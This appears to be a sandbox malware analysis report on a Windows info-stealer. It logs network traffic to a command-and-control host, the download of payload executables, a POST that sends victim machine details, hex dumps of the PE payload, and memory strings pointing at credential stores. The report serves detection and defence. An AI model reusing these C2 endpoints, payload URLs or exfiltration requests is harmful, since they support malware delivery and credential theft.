00 00 a0 07 00 64 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae 6d 00 00 00 10 00 00 00 6e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 2a 00 00 00 80 00 00 00 2c 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 7e 06 00 00 b0 00 00 00 02 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 30 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 20 c7 01 00 00 40 0f 00 00 c8 01 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 32 0f 00 00 00 10 11 00 00 10 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKserver: gunicorndate: Thu, 10 Oct 2024 11:39:45 GMTcontent-disposition: inline; filename=payload.execontent-type: application/x-msdos-programcontent-length: 184320last-modified: Thu, 10 Oct 2024 08:56:01 GMTcache-control: no-cacheetag: "1728550561.2642286-184320-4239461829"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 86 9b 4b 72 c2 fa 25 21 c2 fa 25 21 c2 fa 25 21 26 8a 20 20 c3 fa 25 21 26 8a 26 20 c1 fa 25 21 26 8a 21 20 d1 fa 25 21 26 8a 24 20 d3 fa 25 21 c2 fa 24 21 62 fa 25 21 26 8a 2d 20 c8 fa 25 21 26 8a da 21 c3 fa 25 21 26 8a 27 20 c3 fa 25 21 52 69 63 68 c2 fa 25 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 b4 79 8c e2 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1a 00 80 00 00 00 40 02 00 00 00 00 00 60 84 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 10 00 00 0a 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 e0 02 00 00 10 00 00 22 30 03 00 02 00 60 c1 00 00 08 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 a2 00 00 b4 00 00 00 00 f0 00 00 d4 d0 01 00 00 e0 00 00 2c 04 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 2c 00 00 00 68 9a 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 90 00 00 38 01 00 00 00 00 00 00 00 00 00 00 48 91 00 00 20 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 7e 00 00 00 10 00 00 00 80 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 40 23 00 00 00 90 00 00 00 30 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 1f 00 00 00 c0 00 00 00 10 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 2c 04 00 00 00 e0 00 00 00 10 00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 e0 01 00 00 f0 00 00 00 e0 01 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 2c 00 00 00 00 d0 02 00 00 10 00 00 00 c0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: GET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /fwfsfw/fwf/downloads/FkFjirc.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /ac2e731e-5312-4ee4-9296-cae86cebf978/downloads/e4679797-5458-4ac6-a5d0-c8a5bc775a44/FkFjirc.txt?response-content-disposition=attachment%3B%20filename%3D%22FkFjirc.txt%22&AWSAccessKeyId=ASIA6KOSE3BNITVDYIT5&Signature=aruH8%2FKXLqbr1eotBqLDMrgcfj8%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBwaCXVzLWVhc3QtMSJGMEQCIBJsmv1x4kNJKo%2BlCirZ%2B%2BYSRW%2BTlanKnttCN8gqrtPUAiBWRPk4JyUK056xsTtUiEBQEKunR88JVm69Inqdk%2BvcSSqnAgh1EAAaDDk4NDUyNTEwMTE0NiIMXMqiN6K3TTT97erXKoQCownDAh%2BoC851Lrv1%2FxmNrX4svkNYfLzmICT362uzk%2FgaDF1hKE4PJreodkmm1LTArLhZj3r4PufzeON7acDfGzwwl7%2Bp8NJkuF0dOe9dRDKyeawNH074J%2BIaT1YFIyfAcLJCpGqK4%2BHNvuF0dqzlhfDm61b4aufz0WXmB4oJovp7h7QJvPBdj7%2F8diM3f6iMpVCEX0%2FZUwuB0%2BLrfwG20S37xFaegFpVfx4raoXBRiGp2RuqZyO1r%2F6Gkyu25GiHlzavAvr0%2Bwk%2Bl5O6R68D0k4CiSlmBhU2eOdtRc2tt36gxkxAgvd5Cqu2SLr630d1i2B27QAxrmv85RrvCZdXjaKk4jIwj%2FeeuAY6ngF1g0O87fUqo9nvnUxv95D2W3rIZBWwq%2FiJUGE%2FBC1DUU1ljpKhlRRLPSFLvUB%2B9uSs%2BYTYgd%2B9V9tFitQ5c6vT8MJnGcGKFGXX2N3MAMXXv5xVANZ7BGXJ47ls7BqTpmUtKq49%2FuBnZOf7UaY2VfuQeEgZQctbJ6i9KsoozssZGs5JIawRBpefCQb9CLE1NgwiW0VqYGBjoGm2JAACIQ%3D%3D&Expires=1728561815 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /fwfsfw/fwf/downloads/knSfcpm.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /ac2e731e-5312-4ee4-9296-cae86cebf978/downloads/30826a14-694e-4d25-a618-76f4522de60d/knSfcpm.txt?response-content-disposition=attachment%3B%20filename%3D%22knSfcpm.txt%22&AWSAccessKeyId=ASIA6KOSE3BNEYE44CC7&Signature=qVDX1X76daXyLZfHGVoMf2HQK3Y%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBwaCXVzLWVhc3QtMSJIMEYCIQCbxY5rk%2F7BhoCD%2FL4%2FW1l8cyavKuhg7UvCSoXCbsRKMAIhAPdUNixjDUn6L1I4X16TZGwMrmvTOQKWGNbb2Ili37VFKqcCCHUQABoMOTg0NTI1MTAxMTQ2IgyxHRS5pJpn1YkembkqhAIAB6cuSDC%2Fgvl9FFzwT%2BTJwITs01eaheFjzkPHMRgLVBDTdkbkCKusB%2FIPVwyq6%2FnzFHcE2k9OUVlqYO2N6gKOWgzDiVl7l8f6YaiCPXGCLofmuIqK9ZWruIzcTg6m0t2Jl47mxwO2YxPNhm%2FkR8TR2phu6LTgLc8CFqkdDSTdBNdm%2BGM5D7jhmn9gBT403MRilEZ9ypQTRlLYoXOk5%2BjkRH4EuELoJPhaXhp746fpML8Ho1iacudfwH2UPSkb6XUhD4DX6%2B4XP%2Fv%2BzotYguR8UYXjVsYH3nGoBDwdxzOssabe%2Fo273jnhZQ%2Bg86LtTGTq4SLTJPhFzIms7BiQe%2Bsucwp1eDDa%2BZ64BjqcAS%2FWXt8NZhhqHLkEjCmKgcEOcZCkfBLcI7zGI0fVCjHvtSyf%2BceWo5nS3AWjRYiWZmuecet%2By84hiQnPVrQ2Lqj9nmEehVUnVFlh4ZeUFzzJg0jMRGBeHnhjhzm1egZquLIpCccG6Ij8jV2eP3B9qMJOaPoilCh5ZtmM%2Fi6KdMgyM%2FCTaE2978N4NTi%2Ff%2Fb3mNTKNJIgCRA4l%2Bs9nA%3D%3D&Expires=1728562147 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                      Source: Joe Sandbox ViewIP Address: 185.166.143.48 185.166.143.48
                      Source: Joe Sandbox ViewIP Address: 185.166.143.49 185.166.143.49
                      Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
                      Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49782 -> 104.26.12.205:80
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.9:49904 -> 178.237.33.50:80
                      Source: global trafficHTTP traffic detected: POST /reg_auth_machine HTTP/1.1Content-Type: */*User-Agent: Mozilla FFHost: qwdfewf.comContent-Length: 136Cache-Control: no-cacheData Raw: 7b 22 49 50 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 20 22 55 53 45 52 4e 41 4d 45 22 3a 20 22 74 69 6e 61 22 2c 20 22 4c 41 4e 47 55 41 47 45 22 3a 20 22 65 6e 22 2c 20 22 41 4e 54 49 56 49 52 55 53 22 3a 20 22 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 22 2c 20 22 55 55 49 44 22 3a 20 22 39 64 53 50 48 6d 4f 53 39 6d 49 63 47 56 54 36 52 62 58 4e 61 6d 63 37 58 54 35 46 63 57 57 6d 22 7d Data Ascii: {"IP": "8.46.123.33", "USERNAME": "user", "LANGUAGE": "en", "ANTIVIRUS": "Windows Defender", "UUID": "9dSPHmOS9mIcGVT6RbXNamc7XT5FcWWm"}
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.69
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00401AB0 InternetOpenA,InternetConnectA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,9_2_00401AB0
                      Source: global trafficHTTP traffic detected: GET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /fwfsfw/fwf/downloads/FkFjirc.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /ac2e731e-5312-4ee4-9296-cae86cebf978/downloads/e4679797-5458-4ac6-a5d0-c8a5bc775a44/FkFjirc.txt?response-content-disposition=attachment%3B%20filename%3D%22FkFjirc.txt%22&AWSAccessKeyId=ASIA6KOSE3BNITVDYIT5&Signature=aruH8%2FKXLqbr1eotBqLDMrgcfj8%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBwaCXVzLWVhc3QtMSJGMEQCIBJsmv1x4kNJKo%2BlCirZ%2B%2BYSRW%2BTlanKnttCN8gqrtPUAiBWRPk4JyUK056xsTtUiEBQEKunR88JVm69Inqdk%2BvcSSqnAgh1EAAaDDk4NDUyNTEwMTE0NiIMXMqiN6K3TTT97erXKoQCownDAh%2BoC851Lrv1%2FxmNrX4svkNYfLzmICT362uzk%2FgaDF1hKE4PJreodkmm1LTArLhZj3r4PufzeON7acDfGzwwl7%2Bp8NJkuF0dOe9dRDKyeawNH074J%2BIaT1YFIyfAcLJCpGqK4%2BHNvuF0dqzlhfDm61b4aufz0WXmB4oJovp7h7QJvPBdj7%2F8diM3f6iMpVCEX0%2FZUwuB0%2BLrfwG20S37xFaegFpVfx4raoXBRiGp2RuqZyO1r%2F6Gkyu25GiHlzavAvr0%2Bwk%2Bl5O6R68D0k4CiSlmBhU2eOdtRc2tt36gxkxAgvd5Cqu2SLr630d1i2B27QAxrmv85RrvCZdXjaKk4jIwj%2FeeuAY6ngF1g0O87fUqo9nvnUxv95D2W3rIZBWwq%2FiJUGE%2FBC1DUU1ljpKhlRRLPSFLvUB%2B9uSs%2BYTYgd%2B9V9tFitQ5c6vT8MJnGcGKFGXX2N3MAMXXv5xVANZ7BGXJ47ls7BqTpmUtKq49%2FuBnZOf7UaY2VfuQeEgZQctbJ6i9KsoozssZGs5JIawRBpefCQb9CLE1NgwiW0VqYGBjoGm2JAACIQ%3D%3D&Expires=1728561815 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /fwfsfw/fwf/downloads/knSfcpm.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /ac2e731e-5312-4ee4-9296-cae86cebf978/downloads/30826a14-694e-4d25-a618-76f4522de60d/knSfcpm.txt?response-content-disposition=attachment%3B%20filename%3D%22knSfcpm.txt%22&AWSAccessKeyId=ASIA6KOSE3BNEYE44CC7&Signature=qVDX1X76daXyLZfHGVoMf2HQK3Y%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBwaCXVzLWVhc3QtMSJIMEYCIQCbxY5rk%2F7BhoCD%2FL4%2FW1l8cyavKuhg7UvCSoXCbsRKMAIhAPdUNixjDUn6L1I4X16TZGwMrmvTOQKWGNbb2Ili37VFKqcCCHUQABoMOTg0NTI1MTAxMTQ2IgyxHRS5pJpn1YkembkqhAIAB6cuSDC%2Fgvl9FFzwT%2BTJwITs01eaheFjzkPHMRgLVBDTdkbkCKusB%2FIPVwyq6%2FnzFHcE2k9OUVlqYO2N6gKOWgzDiVl7l8f6YaiCPXGCLofmuIqK9ZWruIzcTg6m0t2Jl47mxwO2YxPNhm%2FkR8TR2phu6LTgLc8CFqkdDSTdBNdm%2BGM5D7jhmn9gBT403MRilEZ9ypQTRlLYoXOk5%2BjkRH4EuELoJPhaXhp746fpML8Ho1iacudfwH2UPSkb6XUhD4DX6%2B4XP%2Fv%2BzotYguR8UYXjVsYH3nGoBDwdxzOssabe%2Fo273jnhZQ%2Bg86LtTGTq4SLTJPhFzIms7BiQe%2Bsucwp1eDDa%2BZ64BjqcAS%2FWXt8NZhhqHLkEjCmKgcEOcZCkfBLcI7zGI0fVCjHvtSyf%2BceWo5nS3AWjRYiWZmuecet%2By84hiQnPVrQ2Lqj9nmEehVUnVFlh4ZeUFzzJg0jMRGBeHnhjhzm1egZquLIpCccG6Ij8jV2eP3B9qMJOaPoilCh5ZtmM%2Fi6KdMgyM%2FCTaE2978N4NTi%2Ff%2Fb3mNTKNJIgCRA4l%2Bs9nA%3D%3D&Expires=1728562147 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: GetIPHost: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /dwn_legit_file HTTP/1.1User-Agent: File DownloaderHost: qwdfewf.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dwn_payload_file HTTP/1.1User-Agent: File DownloaderHost: qwdfewf.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: RegAsm.exe, 00000028.00000002.1679494904.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                      Source: RegAsm.exe, RegAsm.exe, 00000028.00000002.1679494904.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                      Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                      Source: RegAsm.exe, 00000025.00000002.1685991632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                      Source: RegAsm.exe, 00000025.00000002.1685991632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                      Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                      Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: qwdfewf.com
                      Source: global trafficDNS traffic detected: DNS query: KIVYliOyxsOz.KIVYliOyxsOz
                      Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                      Source: unknownHTTP traffic detected: POST /reg_auth_machine HTTP/1.1Content-Type: */*User-Agent: Mozilla FFHost: qwdfewf.comContent-Length: 136Cache-Control: no-cacheData Raw: 7b 22 49 50 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 20 22 55 53 45 52 4e 41 4d 45 22 3a 20 22 74 69 6e 61 22 2c 20 22 4c 41 4e 47 55 41 47 45 22 3a 20 22 65 6e 22 2c 20 22 41 4e 54 49 56 49 52 55 53 22 3a 20 22 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 22 2c 20 22 55 55 49 44 22 3a 20 22 39 64 53 50 48 6d 4f 53 39 6d 49 63 47 56 54 36 52 62 58 4e 61 6d 63 37 58 54 35 46 63 57 57 6d 22 7d Data Ascii: {"IP": "8.46.123.33", "USERNAME": "user", "LANGUAGE": "en", "ANTIVIRUS": "Windows Defender", "UUID": "9dSPHmOS9mIcGVT6RbXNamc7XT5FcWWm"}
                      Source: RegAsm.exe, 00000009.00000002.1533827567.000000000140A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
                      Source: RegAsm.exe, 00000009.00000002.1533827567.0000000001456000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.1533827567.0000000001475000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.1533827567.000000000140A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.1533827567.0000000001422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
                      Source: RegAsm.exe, 00000009.00000002.1533827567.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/$
                      Source: RegAsm.exe, 00000009.00000002.1533827567.0000000001422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org//
                      Source: RegAsm.exe, 00000009.00000002.1533827567.000000000140A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/F)
                      Source: RegAsm.exe, 00000009.00000002.1533827567.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/k
                      Source: RegAsm.exe, 00000009.00000002.1537317900.0000000002060000.00000004.00000020.00020000.00000000.sdmp, PdfReaderEn.EXE.9.dr, legit[1].exe.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: bhvE1B8.tmp.37.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: bhvE1B8.tmp.37.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                      Source: PdfReaderEn.EXE.9.dr, legit[1].exe.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: PdfReaderEn.EXE.9.dr, legit[1].exe.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: PdfReaderEn.EXE.9.dr, legit[1].exe.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: PdfReaderEn.EXE, 0000000B.00000003.1483173388.0000000002A04000.00000004.00000020.00020000.00000000.sdmp, Lucas.pif, 0000001D.00000003.1589061075.00000000038EF000.00000004.00000800.00020000.00000000.sdmp, Lucas.pif.13.dr, InnoCraft.scr.29.dr, Healthcare.11.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                      Source: PdfReaderEn.EXE, 0000000B.00000003.1483173388.0000000002A04000.00000004.00000020.00020000.00000000.sdmp, Lucas.pif, 0000001D.00000003.1589061075.00000000038EF000.00000004.00000800.00020000.00000000.sdmp, Lucas.pif.13.dr, InnoCraft.scr.29.dr, Healthcare.11.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                      Source: PdfReaderEn.EXE, 0000000B.00000003.1483173388.0000000002A04000.00000004.00000020.00020000.00000000.sdmp, Lucas.pif, 0000001D.00000003.1589061075.00000000038EF000.00000004.00000800.00020000.00000000.sdmp, Lucas.pif.13.dr, InnoCraft.scr.29.dr, Healthcare.11.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                      Source: PdfReaderEn.EXE, 0000000B.00000003.1483173388.0000000002A04000.00000004.00000020.00020000.00000000.sdmp, Lucas.pif, 0000001D.00000003.1589061075.00000000038EF000.00000004.00000800.00020000.00000000.sdmp, Lucas.pif.13.dr, InnoCraft.scr.29.dr, Healthcare.11.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                      Source: RegAsm.exe, 00000009.00000002.1537317900.0000000002060000.00000004.00000020.00020000.00000000.sdmp, PdfReaderEn.EXE.9.dr, legit[1].exe.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: bhvE1B8.tmp.37.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: bhvE1B8.tmp.37.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: PdfReaderEn.EXE.9.dr, legit[1].exe.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: PdfReaderEn.EXE.9.dr, legit[1].exe.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: legit[1].exe.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: bhvE1B8.tmp.37.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: PdfReaderEn.EXE.9.dr, legit[1].exe.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
